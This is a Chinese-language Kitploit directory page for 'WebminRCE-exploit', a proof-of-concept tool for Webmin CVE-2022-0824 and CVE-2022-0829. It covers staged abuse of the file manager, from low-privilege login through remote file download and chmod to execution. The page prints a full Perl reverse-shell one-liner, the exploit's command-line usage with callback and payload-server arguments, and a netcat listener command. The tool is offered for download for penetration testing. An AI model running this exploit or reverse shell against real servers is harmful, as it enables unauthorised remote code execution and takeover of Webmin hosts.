Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WebminRCE-exploit — CVE-2022-0824, CVE-2022-0829, 文件管理器权限利用 | Kitploit
工具/GitHubGitHub/gokul-ramesh/webminrce-exploit
权限提升漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubgokul-ramesh/webminrce-exploit

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829, 文件管理器权限利用

查看仓库
23年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WebminRCE-exploit

CVE-2022-0824, CVE-2022-0829 - 文件管理器权限利用

用于测试此PoC的易受攻击应用程序可在此处找到:here,以Docker镜像形式提供。
前提条件:

  • Python3
  • Requests module

描述

漏洞

不正确的访问控制导致远程代码执行 安全用户(低权限用户)可以访问文件管理器模块,而该模块默认可被限制访问。

利用载荷

利用不正确的访问控制漏洞,将cgi文件上传到Webmin服务器。

阶段1(身份验证)

使用安全/低权限用户进行身份验证并登录服务器。

阶段2(将文件下载到服务器)

利用易受攻击的文件管理器(/file-manager/http_download.cgi)模块将perl脚本下载到服务器。
获取反向Shell访问的Perl脚本:
root@kitploit:~
perl -e 'use Socket;$i="0.0.0.0";$p=1111;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

阶段3(修改权限)

为文件(/file-manager/chmod.cgi)添加可执行权限。

阶段4(执行命令)

直接调用上传的文件执行其中的反向Shell脚本。

使用说明:

root@kitploit:~
  $ python3 cve-2022-0824.py --help
  
  usage: cve-2022-0824.py [-h] --host HOST --user USER --password PASSWORD
                        --Python_server PYTHON_SERVER --callback_url
                        CALLBACK_URL [--proxy PROXY]

optional arguments:
  -h, --help            show this help message and exit
  --host HOST           Host url(complete)
  --user USER           Username
  --password PASSWORD   Password
  --Python_server PYTHON_SERVER
                        Python httpServer with port
  --callback_url CALLBACK_URL
                        Callback ip and port
  --proxy PROXY         Proxy details

使用示例:

root@kitploit:~
$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]
root@kitploit:~
$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

用户名和密码用于安全用户(非特权用户) 在运行脚本前设置监听器以获取反向Shell连接。

root@kitploit:~
$ nc -lvp <port>

感谢@faisalfs10x提供的利用程序。

下载工具